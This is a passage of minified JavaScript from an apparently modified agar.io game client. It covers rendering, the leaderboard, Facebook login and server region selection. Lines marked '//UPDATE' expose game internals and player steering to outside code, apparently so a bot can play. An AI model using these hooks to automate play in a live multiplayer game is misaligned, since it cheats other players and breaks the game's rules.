for (c = (b / 2 - t) % 50; c < b; c += 50) f.beginPath(), f.moveTo(0, c * h - .5), f.lineTo(a * h, c * h - .5), f.stroke();
f.restore()
}
function Cb() {
if (Qa && Ja.width) {
var a = m / 5;
f.drawImage(Ja, 5, 5, a, a)
}
}
function Bb() {
for (var a = 0, b = 0; b < k.length; b++) a += k[b].q * k[b].q;
return a
}
function ab() {
z = null;
if (null != A || 0 != F.length)
if (null != A || wa) {
z = document.createElement("canvas");
var a = z.getContext("2d"),
b = 60,
b = null == A ? b + 24 * F.length : b + 180,
c = Math.min(200, .3 * m) / 200;
z.width = 200 * c;
z.height = b * c;
a.scale(c, c);
a.globalAlpha = .4;
a.fillStyle = "#000000";
a.fillRect(0, 0, 200, b);
a.globalAlpha =
1;
a.fillStyle = "#FFFFFF";
c = null;
c = Z("leaderboard");
a.font = "30px Ubuntu";
a.fillText(c, 100 - a.measureText(c).width / 2, 40);
if (null == A)
for (a.font = "20px Ubuntu", b = 0; b < F.length; ++b) c = F[b].name || Z("unnamed_cell"), wa || (c = Z("unnamed_cell")), -1 != M.indexOf(F[b].id) ? (k[0].name && (c = k[0].name), a.fillStyle = "#FFAAAA") : a.fillStyle = "#FFFFFF", c = b + 1 + ". " + c, a.fillText(c, 100 - a.measureText(c).width / 2, 70 + 24 * b);
else
for (b = c = 0; b < A.length; ++b) {
var d = c + A[b] * Math.PI * 2;
a.fillStyle = Db[b + 1];
a.beginPath();
a.moveTo(100, 140);
a.arc(100,
140, 80, c, d, !1);
a.fill();
c = d
}
}
}
function Ka(a, b, c, d, e) {
this.V = a;
this.x = b;
this.y = c;
this.i = d;
this.b = e
}
function da(a, b, c, d, e, p) {
this.id = a;
this.s = this.x = b;
this.t = this.y = c;
this.r = this.size = d;
this.color = e;
this.a = [];
this.W();
this.B(p)
}
function va(a, b, c, d) {
a && (this.u = a);
b && (this.S = b);
this.U = !!c;
d && (this.v = d)
}
function S(a, b) {
var c = "1" == e("#helloContainer").attr("data-has-account-data");
e("#helloContainer").attr("data-has-account-data", "1");
if (null == b && d.localStorage.loginCache) {
var l = JSON.parse(d.localStorage.loginCache);
l.f = a.f;
l.d = a.d;
l.e = a.e;
d.localStorage.loginCache = JSON.stringify(l)
}
if (c) {
var u = +e(".agario-exp-bar .progress-bar-text").first().text().split("/")[0],
c = +e(".agario-exp-bar .progress-bar-text").first().text().split("/")[1].split(" ")[0],
l = e(".agario-profile-panel .progress-bar-star").first().text();
if (l != a.e) S({
f: c,
d: c,
e: l
}, function() {
e(".agario-profile-panel .progress-bar-star").text(a.e);
e(".agario-exp-bar .progress-bar").css("width", "100%");
e(".progress-bar-star").addClass("animated tada").one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend",
function() {
e(".progress-bar-star").removeClass("animated tada")
});
setTimeout(function() {
e(".agario-exp-bar .progress-bar-text").text(a.d + "/" + a.d + " XP");
S({
f: 0,
d: a.d,
e: a.e
}, function() {
S(a, b)
})
}, 1E3)
});
else {
var p = Date.now(),
g = function() {
var c;
c = (Date.now() - p) / 1E3;
c = 0 > c ? 0 : 1 < c ? 1 : c;
c = c * c * (3 - 2 * c);
e(".agario-exp-bar .progress-bar-text").text(~~(u + (a.f - u) * c) + "/" + a.d + " XP");
e(".agario-exp-bar .progress-bar").css("width", (88 * (u + (a.f - u) * c) / a.d).toFixed(2) + "%");
1 > c ? d.requestAnimationFrame(g) : b && b()
};
d.requestAnimationFrame(g)
}
} else e(".agario-profile-panel .progress-bar-star").text(a.e),
e(".agario-exp-bar .progress-bar-text").text(a.f + "/" + a.d + " XP"), e(".agario-exp-bar .progress-bar").css("width", (88 * a.f / a.d).toFixed(2) + "%"), b && b()
}
function jb(a) {
"string" == typeof a && (a = JSON.parse(a));
Date.now() + 18E5 > a.ja ? e("#helloContainer").attr("data-logged-in", "0") : (d.localStorage.loginCache = JSON.stringify(a), B = a.fa, e(".agario-profile-name").text(a.name), $a(), S({
f: a.f,
d: a.d,
e: a.e
}), e("#helloContainer").attr("data-logged-in", "1"))
}
function Eb(a) {
a = a.split("\n");
jb({
name: a[0],
ta: a[1],
fa: a[2],
ja: 1E3 *
+a[3],
e: +a[4],
f: +a[5],
d: +a[6]
});
console.log("Hello Facebook?");
}
function La(a) {
if ("connected" == a.status) {
var b = a.authResponse.accessToken;
d.FB.api("/me/picture?width=180&height=180", function(a) {
d.localStorage.fbPictureCache = a.data.url;
e(".agario-profile-picture").attr("src", a.data.url)
});
e("#helloContainer").attr("data-logged-in", "1");
null != B ? e.ajax("https://m.agar.io/checkToken", {
error: function() {
console.log("Facebook Fail!");
B = null;
La(a)
},
success: function(a) {
a = a.split("\n");
S({
e: +a[0],
f: +a[1],
d: +a[2]
});
console.log("Facebook connected!");
},
dataType: "text",
method: "POST",
cache: !1,
crossDomain: !0,
data: B
}) : e.ajax("https://m.agar.io/facebookLogin", {
error: function() {
console.log("You have a Facebook problem!");
B = null;
e("#helloContainer").attr("data-logged-in", "0")
},
success: Eb,
dataType: "text",
method: "POST",
cache: !1,
crossDomain: !0,
data: b
})
}
}
function Wa(a) {
Y(":party");
e("#helloContainer").attr("data-party-state", "4");
a = decodeURIComponent(a).replace(/.*#/gim, "");
Ma("#" + d.encodeURIComponent(a));
e.ajax(Na + "//m.agar.io/getToken", {
error: function() {
e("#helloContainer").attr("data-party-state", "6")
},
success: function(b) {
b = b.split("\n");
e(".partyToken").val("<PASSWORD>/#" +
d.encodeURIComponent(a));
e("#helloContainer").attr("data-party-state", "5");
Y(":party");
Ca("ws://" + b[0], a)
},
dataType: "text",
method: "POST",
cache: !1,
crossDomain: !0,
data: a
})
}
function Ma(a) {
d.history && d.history.replaceState && d.history.replaceState({}, d.document.title, a)
}
if (!d.agarioNoInit) {
var Na = d.location.protocol,
tb = "https:" == Na,
xa = d.navigator.userAgent;
if (-1 != xa.indexOf("Android")) d.ga && d.ga("send", "event", "MobileRedirect", "PlayStore"), setTimeout(function() {
d.location.href = "market://details?id=com.miniclip.agar.io"
},
1E3);
else if (-1 != xa.indexOf("iPhone") || -1 != xa.indexOf("iPad") || -1 != xa.indexOf("iPod")) d.ga && d.ga("send", "event", "MobileRedirect", "AppStore"), setTimeout(function() {
d.location.href = "https://itunes.apple.com/app/agar.io/id995999703"
}, 1E3);
else {
var za, f, G, m, r, X = null,
//UPDATE
toggle = false,
toggleDraw = true,
toggleFollow = false,
tempPoint = [0, 0, 1],
dPoints = [],
circles = [],
dArc = [],
dText = [],
lines = [],
names = ["<EMAIL>"],
originalName = names[Math.floor(Math.random() * names.length)],
sessionScore = 0,
serverIP = "",
interNodes = [],
lifeTimer = new Date(),
bestTime = 0,
botIndex = 0,
reviving = false,
message = [],
selectedCell = 0,
q = null,
s = 0,
t = 0,
M = [],
k = [],
E = {},
v = [],
Q = [],
F = [],
fa = 0,
ga = 0,
//UPDATE
ia = [-1],
ja = [-1],
zb = 0,
C = 0,
ib = 0,
K = null,
pa = 0,
qa = 0,
ra = 1E4,
sa = 1E4,
h = 1,
y = null,
kb = !0,
wa = !0,
Oa = !1,
Ha = !1,
R = 0,
ta = !1,
lb = !1,
aa = s = ~~((pa + ra) / 2),
ba = t = ~~((qa + sa) / 2),
ca = 1,
P = "",
A = null,
ya = !1,
Ga = !1,
Ea = 0,
Fa =
0,
na = 0,
oa = 0,
mb = 0,
Db = ["#333333", "#FF3333", "#33FF33", "#3333FF"],
Ia = !1,
$ = !1,
bb = 0,
B = null,
J = 1,
x = 1,
W = !0,
Ba = 0,
Da = {};
(function() {
var a = d.location.search;
"?" == a.charAt(0) && (a = a.slice(1));
for (var a = a.split("&"), b = 0; b < a.length; b++) {
var c = a[b].split("=");
Da[c[0]] = c[1]
}
})();
var Qa = "ontouchstart" in d && /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(d.navigator.userAgent),
Ja = new Image;
Ja.src = "img/split.png";
var nb = document.createElement("canvas");
if ("undefined" == typeof console || "undefined" ==
typeof DataView || "undefined" == typeof WebSocket || null == nb || null == nb.getContext || null == d.localStorage) alert("Your browser does not support this game, we recommend you use Firefox to play it");
else {
var ka = null;
d.setNick = function(a) {
//UPDATE
originalName = a;
if (getPlayer().length == 0) {
lifeTimer = new Date();
}
Xa();
K = a;
cb();
R = 0
};
d.setRegion = ha;
d.setSkins = function(a) {
kb = a
};
d.setNames = function(a) {
wa = a
};
d.setDarkTheme = function(a) {
ta = a
};
d.setColors = function(a) {
Oa = a
};
d.setShowMass = function(a) {
lb = a
};
d.spectate = function() {
K = null;
H(1);
Xa()
};
d.setGameMode = function(a) {
a != P && (":party" ==
P && e("#helloContainer").attr("data-party-state", "0"), Y(a), ":party" != a && I())
};
d.setAcid = function(a) {
Ia = a
};
null != d.localStorage && (null == d.localStorage.AB9 && (d.localStorage.AB9 = 0 + ~~(100 * Math.random())), mb = +d.localStorage.AB9, d.ABGroup = mb);
e.get(Na + "//gc.agar.io", function(a) {
var b = a.split(" ");
a = b[0];
b = b[1] || ""; - 1 == ["UA"].indexOf(a) && ob.push("ussr");
ea.hasOwnProperty(a) && ("string" == typeof ea[a] ? y || ha(ea[a]) : ea[a].hasOwnProperty(b) && (y || ha(ea[a][b])))
}, "text");
d.ga && d.ga("send", "event", "User-Agent", d.navigator.userAgent, {
nonInteraction: 1
});
var la = !1,
Ya = 0;
setTimeout(function() {
la = !0
}, Math.max(6E4 * Ya, 1E4));
var ea = {
AF: "JP-Tokyo",
AX: "EU-London",
AL: "EU-London",
DZ: "EU-London",
AS: "SG-Singapore",
AD: "EU-London",
AO: "EU-London",
AI: "US-Atlanta",
AG: "US-Atlanta",
AR: "BR-Brazil",
AM: "JP-Tokyo",
AW: "US-Atlanta",
AU: "SG-Singapore",
AT: "EU-London",
AZ: "JP-Tokyo",
BS: "US-Atlanta",
BH: "JP-Tokyo",
BD: "JP-Tokyo",
BB: "US-Atlanta",
BY: "EU-London",
BE: "EU-London",
BZ: "US-Atlanta",
BJ: "EU-London",
BM: "US-Atlanta",
BT: "JP-Tokyo",
BO: "BR-Brazil",
BQ: "US-Atlanta",
BA: "EU-London",
BW: "EU-London",
BR: "BR-Brazil",
IO: "JP-Tokyo",
VG: "US-Atlanta",
BN: "JP-Tokyo",
BG: "EU-London",
BF: "EU-London",
BI: "EU-London",
KH: "JP-Tokyo",
CM: "EU-London",
CA: "US-Atlanta",
CV: "EU-London",
KY: "US-Atlanta",
CF: "EU-London",
TD: "EU-London",
CL: "BR-Brazil",
CN: "CN-China",
CX: "JP-Tokyo",
CC: "JP-Tokyo",
CO: "BR-Brazil",
KM: "EU-London",
CD: "EU-London",
CG: "EU-London",
CK: "SG-Singapore",
CR: "US-Atlanta",
CI: "EU-London",
HR: "EU-London",
CU: "US-Atlanta",
CW: "US-Atlanta",
CY: "JP-Tokyo",
CZ: "EU-London",
DK: "EU-London",
DJ: "EU-London",
DM: "US-Atlanta",
DO: "US-Atlanta",
EC: "BR-Brazil",
EG: "EU-London",
SV: "US-Atlanta",
GQ: "EU-London",
ER: "EU-London",
EE: "EU-London",
ET: "EU-London",
FO: "EU-London",
FK: "BR-Brazil",
FJ: "SG-Singapore",
FI: "EU-London",
FR: "EU-London",
GF: "BR-Brazil",
PF: "SG-Singapore",
GA: "EU-London",
GM: "EU-London",
GE: "JP-Tokyo",
DE: "EU-London",
GH: "EU-London",
GI: "EU-London",
GR: "EU-London",
GL: "US-Atlanta",
GD: "US-Atlanta",
GP: "US-Atlanta",
GU: "SG-Singapore",
GT: "US-Atlanta",
GG: "EU-London",
GN: "EU-London",
GW: "EU-London",
GY: "BR-Brazil",
HT: "US-Atlanta",
VA: "EU-London",
HN: "US-Atlanta",
HK: "JP-Tokyo",
HU: "EU-London",
IS: "EU-London",
IN: "JP-Tokyo",
ID: "JP-Tokyo",
IR: "JP-Tokyo",
IQ: "JP-Tokyo",
IE: "EU-London",
IM: "EU-London",
IL: "JP-Tokyo",
IT: "EU-London",
JM: "US-Atlanta",
JP: "JP-Tokyo",
JE: "EU-London",
JO: "JP-Tokyo",
KZ: "JP-Tokyo",
KE: "EU-London",
KI: "SG-Singapore",
KP: "JP-Tokyo",
KR: "JP-Tokyo",
KW: "JP-Tokyo",
KG: "JP-Tokyo",
LA: "JP-Tokyo",
LV: "EU-London",
LB: "JP-Tokyo",
LS: "EU-London",
LR: "EU-London",
LY: "EU-London",
LI: "EU-London",
LT: "EU-London",
LU: "EU-London",
MO: "JP-Tokyo",
MK: "EU-London",
MG: "EU-London",
MW: "EU-London",
MY: "JP-Tokyo",
MV: "JP-Tokyo",
ML: "EU-London",
MT: "EU-London",
MH: "SG-Singapore",
MQ: "US-Atlanta",
MR: "EU-London",
MU: "EU-London",
YT: "EU-London",
MX: "US-Atlanta",
FM: "SG-Singapore",
MD: "EU-London",
MC: "EU-London",
MN: "JP-Tokyo",
ME: "EU-London",
MS: "US-Atlanta",
MA: "EU-London",
MZ: "EU-London",
MM: "JP-Tokyo",
NA: "EU-London",
NR: "SG-Singapore",
NP: "JP-Tokyo",
NL: "EU-London",
NC: "SG-Singapore",
NZ: "SG-Singapore",
NI: "US-Atlanta",
NE: "EU-London",
NG: "EU-London",
NU: "SG-Singapore",
NF: "SG-Singapore",
MP: "SG-Singapore",
NO: "EU-London",
OM: "JP-Tokyo",
PK: "JP-Tokyo",
PW: "SG-Singapore",
PS: "JP-Tokyo",
PA: "US-Atlanta",
PG: "SG-Singapore",
PY: "BR-Brazil",
PE: "BR-Brazil",
PH: "JP-Tokyo",
PN: "SG-Singapore",
PL: "EU-London",
PT: "EU-London",
PR: "US-Atlanta",
QA: "JP-Tokyo",
RE: "EU-London",
RO: "EU-London",
RU: "RU-Russia",
RW: "EU-London",
BL: "US-Atlanta",
SH: "EU-London",
KN: "US-Atlanta",
LC: "US-Atlanta",
MF: "US-Atlanta",
PM: "US-Atlanta",
VC: "US-Atlanta",
WS: "SG-Singapore",
SM: "EU-London",
ST: "EU-London",
SA: "EU-London",
SN: "EU-London",
RS: "EU-London",
SC: "EU-London",
SL: "EU-London",
SG: "JP-Tokyo",
SX: "US-Atlanta",
SK: "EU-London",
SI: "EU-London",
SB: "SG-Singapore",
SO: "EU-London",
ZA: "EU-London",
SS: "EU-London",
ES: "EU-London",
LK: "JP-Tokyo",
SD: "EU-London",
SR: "BR-Brazil",
SJ: "EU-London",
SZ: "EU-London",
SE: "EU-London",
CH: "EU-London",
SY: "EU-London",
TW: "JP-Tokyo",
TJ: "JP-Tokyo",
TZ: "EU-London",
TH: "JP-Tokyo",
TL: "JP-Tokyo",
TG: "EU-London",
TK: "SG-Singapore",
TO: "SG-Singapore",
TT: "US-Atlanta",
TN: "EU-London",
TR: "TK-Turkey",
TM: "JP-Tokyo",
TC: "US-Atlanta",
TV: "SG-Singapore",
UG: "EU-London",
UA: "EU-London",
AE: "EU-London",
GB: "EU-London",
US: "US-Atlanta",
UM: "SG-Singapore",
VI: "US-Atlanta",
UY: "BR-Brazil",
UZ: "JP-Tokyo",
VU: "SG-Singapore",
VE: "BR-Brazil",
VN: "JP-Tokyo",
WF: "SG-Singapore",
EH: "EU-London",
YE: "JP-Tokyo",
ZM: "EU-London",
ZW: "EU-London"
},
L = null;
d.connect = Ca;
//UPDATE
window.getDarkBool = function() {
return ta;
}
window.getMassBool = function() {
return lb;
}
window.getMemoryCells = function() {
return interNodes;
}
window.getCellsArray = function() {
return v;
}
window.getCells = function() {
return E;
}
window.getPlayer = function() {
return k;
}
window.getWidth = function() {
return m;
}
window.getHeight = function() {
return r;
}
window.getRatio = function() {
return h;
}
window.getOffsetX = function() {
return aa;
}
window.getOffsetY = function() {
return ba;
}
window.getX = function() {
return s;
}
window.getY = function() {
return t;
}
window.getPointX = function() {
return ia[0];
}
window.getPointY = function() {
return ja[0];
}
window.getMouseX = function() {
return fa;
}
window.getMouseY = function() {
return ga;
}
window.getMapStartX = function() {
return pa;
}
window.getMapStartY = function() {
return qa;
}
window.getMapEndX = function() {
return ra;
}
window.getMapEndY = function() {
return sa;
}
window.getScreenDistance = function() {
var temp = screenDistance();
return temp;
}
window.getLastUpdate = function() {
return C;
}
window.getCurrentScore = function() {
return R;
}
window.getMode = function() {
return P;
}
window.setPoint = function(x, y, index) {
while (ia.length > getPlayer().length) {
ia.pop();
ja.pop();
}
if (index < ia.length) {
ia[index] = x;
ja[index] = y;
} else {
while (ia.length < index) { // pad with placeholders so x, y land at position 'index'
ia.push(-1);
ja.push(-1);
}
ia.push(x);
ja.push(y);
}
}
window.setScore = function(a) {
sessionScore = a * 100;
}
window.setBestTime = function(a) {
bestTime = a;
}
window.best = function(a, b) {
setScore(a);
setBestTime(b);
}
window.setBotIndex = function(a) {
console.log("Changing bot");
botIndex = a;
}
window.setMessage = function(a) {
message = a;
}
var ma = 500,
eb = -1,
fb = -1,
z = null,
D = 1,
ua = null,
Ua = function() {
var a = Date.now(),
b = 1E3 / 60;
return function() {
d.requestAnimationFrame(Ua);
var c = Date.now(),
l = c - a;
l > b && (a = c - l % b, !T() || 240 > Date.now() - bb ? gb() : console.warn("Skipping draw"), Fb())
}
}(),
U = {},
ob = "agariotool.com;poland;usa;china;russia;canada;australia;spain;brazil;germany;ukraine;france;sweden;chaplin;north korea;south korea;japan;united kingdom;earth;greece;latvia;lithuania;estonia;finland;norway;cia;maldivas;austria;nigeria;reddit;yaranaika;confederate;9gag;indiana;4chan;italy;bulgaria;tumblr;2ch.hk;hong kong;portugal;jamaica;german empire;mexico;sanik;switzerland;croatia;chile;indonesia;bangladesh;thailand;iran;iraq;peru;moon;botswana;bosnia;netherlands;european union;taiwan;pakistan;hungary;satanist;qing dynasty;matriarchy;patriarchy;feminism;ireland;texas;facepunch;prodota;cambodia;steam;piccolo;ea;india;kc;denmark;quebec;ayy lmao;sealand;bait;tsarist russia;origin;vinesauce;stalin;belgium;luxembourg;stussy;prussia;8ch;argentina;scotland;sir;romania;belarus;wojak;doge;nasa;byzantium;imperial japan;french kingdom;somalia;turkey;mars;pokerface;8;irs;receita federal;facebook".split(";"),
Gb = ["8", "nasa"],
Hb = ["m'blob"];
Ka.prototype = {
V: null,
x: 0,
y: 0,
i: 0,
b: 0
};
da.prototype = {
id: 0,
a: null,
name: null,
o: null,
O: null,
x: 0,
y: 0,
size: 0,
s: 0,
t: 0,
r: 0,
J: 0,
K: 0,
q: 0,
ba: 0,
Q: 0,
sa: 0,
ia: 0,
G: !1,
h: !1,
n: !1,
R: !0,
Y: 0,
//UPDATE
updateCode: 0,
danger: false,
dangerTimeOut: 0,
isVirus: function() {
return this.h;
},
getUptimeTime: function() {
return this.Q;
},
X: function() {
var a;
for (a = 0; a < v.length; a++)
if (v[a] == this) {
v.splice(a, 1);
break
}
delete E[this.id];
a = k.indexOf(this); - 1 != a && (Ha = !0, k.splice(a, 1));
a = M.indexOf(this.id); - 1 != a && M.splice(a, 1);
this.G = !0;
0 < this.Y && Q.push(this)
},
l: function() {
return Math.max(~~(.3 * this.size), 24)
},
B: function(a) {
if (this.name = a) null ==
this.o ? this.o = new va(this.l(), "#FFFFFF", !0, "#000000") : this.o.M(this.l()), this.o.C(this.name)
},
W: function() {
for (var a = this.I(); this.a.length > a;) {
var b = ~~(Math.random() * this.a.length);
this.a.splice(b, 1)
}
for (0 == this.a.length && 0 < a && this.a.push(new Ka(this, this.x, this.y, this.size, Math.random() - .5)); this.a.length < a;) b = ~~(Math.random() * this.a.length), b = this.a[b], this.a.push(new Ka(this, b.x, b.y, b.i, b.b))
},
I: function() {
var a = 10;
20 > this.size && (a = 0);
this.h && (a = 30);
var b = this.size;
this.h || (b *= h);
b *= D;
this.ba &
32 && (b *= .25);
return ~~Math.max(b, a)
},
qa: function() {
this.W();
for (var a = this.a, b = a.length, c = 0; c < b; ++c) {
var d = a[(c - 1 + b) % b].b,
e = a[(c + 1) % b].b;
a[c].b += (Math.random() - .5) * (this.n ? 3 : 1);
a[c].b *= .7;
10 < a[c].b && (a[c].b = 10); - 10 > a[c].b && (a[c].b = -10);
a[c].b = (d + e + 8 * a[c].b) / 10
}
for (var p = this, g = this.h ? 0 : (this.id / 1E3 + C / 1E4) % (2 * Math.PI), c = 0; c < b; ++c) {
var f = a[c].i,
d = a[(c - 1 + b) % b].i,
e = a[(c + 1) % b].i;
if (15 < this.size && null != X && 20 < this.size * h && 0 < this.id) {
var k = !1,
w = a[c].x,
m = a[c].y;
X.ra(w - 5, m - 5, 10, 10, function(a) {
a.V != p && 25 > (w -
a.x) * (w - a.x) + (m - a.y) * (m - a.y) && (k = !0)
});
!k && (a[c].x < pa || a[c].y < qa || a[c].x > ra || a[c].y > sa) && (k = !0);
k && (0 < a[c].b && (a[c].b = 0), a[c].b -= 1)
}
f += a[c].b;
0 > f && (f = 0);
f = this.n ? (19 * f + this.size) / 20 : (12 * f + this.size) / 13;
a[c].i = (d + e + 8 * f) / 10;
d = 2 * Math.PI / b;
e = this.a[c].i;
this.h && 0 == c % 2 && (e += 5);
a[c].x = this.x + Math.cos(d * c + g) * e;
a[c].y = this.y + Math.sin(d * c + g) * e
}
},
P: function() {
if (0 >= this.id) return 1;
var a;
a = (C - this.Q) / 120;
a = 0 > a ? 0 : 1 < a ? 1 : a;
var b = 0 > a ? 0 : 1 < a ? 1 : a;
this.l();
if (this.G && 1 <= b) {
var c = Q.indexOf(this); - 1 != c && Q.splice(c, 1)
}
this.x =
a * (this.J - this.s) + this.s;
this.y = a * (this.K - this.t) + this.t;
this.size = b * (this.q - this.r) + this.r;
return b
},
N: function() {
return 0 >= this.id ? !0 : this.x + this.size + 40 < s - m / 2 / h || this.y + this.size + 40 < t - r / 2 / h || this.x - this.size - 40 > s + m / 2 / h || this.y - this.size - 40 > t + r / 2 / h ? !1 : !0
},
w: function(a) {
if (this.N()) {
++this.Y;
var b = 0 < this.id && !this.h && !this.n && .4 > h;
5 > this.I() && (b = !0);
if (this.R && !b)
for (var c = 0; c < this.a.length; c++) this.a[c].i = this.size;
this.R = b;
a.save();
this.ia = C;
c = this.P();
this.G && (a.globalAlpha *= 1 - c);
a.lineWidth =
10;
a.lineCap = "round";
a.lineJoin = this.h ? "miter" : "round";
Oa ? (a.fillStyle = "#FFFFFF", a.strokeStyle = "#AAAAAA") : (a.fillStyle = this.color, a.strokeStyle = this.color);
if (b) a.beginPath(), a.arc(this.x, this.y, this.size + 5, 0, 2 * Math.PI, !1);
else {
this.qa();
a.beginPath();
var d = this.I();
a.moveTo(this.a[0].x, this.a[0].y);
for (c = 1; c <= d; ++c) {
var e = c % d;
a.lineTo(this.a[e].x, this.a[e].y)
}
}
a.closePath();
d = this.name.toLowerCase();
!this.n && kb && ":teams" != P ? -1 != ob.indexOf(d) ? (U.hasOwnProperty(d) || (U[d] = new Image, (U[d].src = "http://i.imgur.com/6rRTTP7.gif")), c = 0 != U[d].width && U[d].complete ? U[d] : null) : c = null : c = null;
c = (e = c) ? -1 != Hb.indexOf(d) : !1;
b || a.stroke();
a.fill();
null == e || c || (a.save(), a.clip(), a.drawImage(e, this.x - this.size, this.y - this.size, 2 * this.size, 2 * this.size), a.restore());
(Oa || 15 < this.size) && !b && (a.strokeStyle = "#000000", a.globalAlpha *= .1, a.stroke());
a.globalAlpha = 1;
null != e && c && a.drawImage(e, this.x - 2 * this.size, this.y - 2 * this.size, 4 * this.size, 4 * this.size);
c = -1 != k.indexOf(this);
b = ~~this.y;
if (0 != this.id && (wa || c) && this.name && this.o && (null ==
e || -1 == Gb.indexOf(d))) {
e = this.o;
e.C(this.name);
e.M(this.l());
d = 0 >= this.id ? 1 : Math.ceil(10 * h) / 10;
e.ea(d);
var e = e.L(),
p = ~~(e.width / d),
g = ~~(e.height / d);
a.drawImage(e, ~~this.x - ~~(p / 2), b - ~~(g / 2), p, g);
b += e.height / 2 / d + 4
}
0 < this.id && lb && (c || 0 == k.length && (!this.h || this.n) && 20 < this.size) && (null == this.O && (this.O = new va(this.l() / 2, "#FFFFFF", !0, "#000000")), c = this.O, c.M(this.l() / 2), c.C(~~(this.size * this.size / 100)), d = Math.ceil(10 * h) / 10, c.ea(d), e = c.L(), p = ~~(e.width / d), g = ~~(e.height / d), a.drawImage(e, ~~this.x - ~~(p / 2),
b - ~~(g / 2), p, g));
a.restore()
}
}
};
va.prototype = {
F: "",
S: "#000000",
U: !1,
v: "#000000",
u: 16,
p: null,
T: null,
k: !1,
D: 1,
M: function(a) {
this.u != a && (this.u = a, this.k = !0)
},
ea: function(a) {
this.D != a && (this.D = a, this.k = !0)
},
setStrokeColor: function(a) {
this.v != a && (this.v = a, this.k = !0)
},
C: function(a) {
a != this.F && (this.F = a, this.k = !0)
},
L: function() {
null == this.p && (this.p = document.createElement("canvas"), this.T = this.p.getContext("2d"));
if (this.k) {
this.k = !1;
var a = this.p,
b = this.T,
c = this.F,
d = this.D,
e = this.u,
p = e + "px Ubuntu";
b.font =
p;
var g = ~~(.2 * e);
a.width = (b.measureText(c).width + 6) * d;
a.height = (e + g) * d;
b.font = p;
b.scale(d, d);
b.globalAlpha = 1;
b.lineWidth = 3;
b.strokeStyle = this.v;
b.fillStyle = this.S;
this.U && b.strokeText(c, 3, e - g / 2);
b.fillText(c, 3, e - g / 2)
}
return this.p
}
};
Date.now || (Date.now = function() {
return (new Date).getTime()
});
(function() {
for (var a = ["ms", "moz", "webkit", "o"], b = 0; b < a.length && !d.requestAnimationFrame; ++b) d.requestAnimationFrame = d[a[b] + "RequestAnimationFrame"], d.cancelAnimationFrame = d[a[b] + "CancelAnimationFrame"] || d[a[b] +
"CancelRequestAnimationFrame"];
d.requestAnimationFrame || (d.requestAnimationFrame = function(a) {
return setTimeout(a, 1E3 / 60)
}, d.cancelAnimationFrame = function(a) {
clearTimeout(a)
})
})();
var rb = {
ka: function(a) {
function b(a, b, c, d, e) {
this.x = a;
this.y = b;
this.j = c;
this.g = d;
this.depth = e;
this.items = [];
this.c = []
}
var c = a.ma || 2,
d = a.na || 4;
b.prototype = {
x: 0,
y: 0,
j: 0,
g: 0,
depth: 0,
items: null,
c: null,
H: function(a) {
for (var b = 0; b < this.items.length; ++b) {
var c = this.items[b];
if (c.x >= a.x && c.y >= a.y && c.x < a.x + a.j && c.y < a.y + a.g) return !0
}
if (0 !=
this.c.length) {
var d = this;
return this.$(a, function(b) {
return d.c[b].H(a)
})
}
return !1
},
A: function(a, b) {
for (var c = 0; c < this.items.length; ++c) b(this.items[c]);
if (0 != this.c.length) {
var d = this;
this.$(a, function(c) {
d.c[c].A(a, b)
})
}
},
m: function(a) {
0 != this.c.length ? this.c[this.Z(a)].m(a) : this.items.length >= c && this.depth < d ? (this.ha(), this.c[this.Z(a)].m(a)) : this.items.push(a)
},
Z: function(a) {
return a.x < this.x + this.j / 2 ? a.y < this.y + this.g / 2 ? 0 : 2 : a.y < this.y + this.g / 2 ? 1 : 3
},
$: function(a, b) {
return a.x < this.x + this.j / 2 &&
(a.y < this.y + this.g / 2 && b(0) || a.y >= this.y + this.g / 2 && b(2)) || a.x >= this.x + this.j / 2 && (a.y < this.y + this.g / 2 && b(1) || a.y >= this.y + this.g / 2 && b(3)) ? !0 : !1
},
ha: function() {
var a = this.depth + 1,
c = this.j / 2,
d = this.g / 2;
this.c.push(new b(this.x, this.y, c, d, a));
this.c.push(new b(this.x + c, this.y, c, d, a));
this.c.push(new b(this.x, this.y + d, c, d, a));
this.c.push(new b(this.x + c, this.y + d, c, d, a));
a = this.items;
this.items = [];
for (c = 0; c < a.length; c++) this.m(a[c])
},
clear: function() {
for (var a = 0; a < this.c.length; a++) this.c[a].clear();
this.items.length =
0;
this.c.length = 0
}
};
var e = {
x: 0,
y: 0,
j: 0,
g: 0
};
return {
root: new b(a.ca, a.da, a.oa - a.ca, a.pa - a.da, 0),
m: function(a) {
this.root.m(a)
},
A: function(a, b) {
this.root.A(a, b)
},
ra: function(a, b, c, d, f) {
e.x = a;
e.y = b;
e.j = c;
e.g = d;
this.root.A(e, f)
},
H: function(a) {
return this.root.H(a)
},
clear: function() {
this.root.clear()
}
}
}
},
db = function() {
var a = new da(0, 0, 0, 32, "#ED1C24", ""),
b = document.createElement("canvas");
b.width = 32;
b.height = 32;
var c = b.getContext("2d");
return function() {
0 < k.length && (a.color = k[0].color, a.B(k[0].name));
c.clearRect(0,
0, 32, 32);
c.save();
c.translate(16, 16);
c.scale(.4, .4);
a.w(c);
c.restore();
var d = document.getElementById("favicon"),
e = d.cloneNode(!0);
//UPDATE -- NO IDEA WHAT I JUST DID THERE!
//e.setAttribute("href", b.toDataURL("image/png"));
d.parentNode.replaceChild(e, d)
}
}();
e(function() {
db()
});
e(function() {
+d.localStorage.wannaLogin && (d.localStorage.loginCache && jb(d.localStorage.loginCache), d.localStorage.fbPictureCache && e(".agario-profile-picture").attr("src", d.localStorage.fbPictureCache))
});
d.facebookLogin = function() {
d.localStorage.wannaLogin = 1
};
d.fbAsyncInit =
function() {
function a() {
d.localStorage.wannaLogin = 1;
null == d.FB ? alert("You seem to have something blocking Facebook on your browser, please check for any extensions") : d.FB.login(function(a) {
La(a)
}, {
scope: "public_profile, email"
})
}
d.FB.init({
appId: "677505792353827",
cookie: !0,
xfbml: !0,
status: !0,
version: "v2.2"
});
d.FB.Event.subscribe("auth.statusChange", function(b) {
+d.localStorage.wannaLogin && ("connected" == b.status ? La(b) : a())
});
d.facebookLogin = a
};
d.logout = function() {
B = null;
e("#helloContainer").attr("data-logged-in",
"0");
e("#helloContainer").attr("data-has-account-data", "0");
delete d.localStorage.wannaLogin;
delete d.localStorage.loginCache;
delete d.localStorage.fbPictureCache;
I()
};
var Fb = function() {
function a(a, b, c, d, e) {
var f = b.getContext("2d"),
h = b.width;
b = b.height;
a.color = e;
a.B(c);
a.size = d;
f.save();
f.translate(h / 2, b / 2);
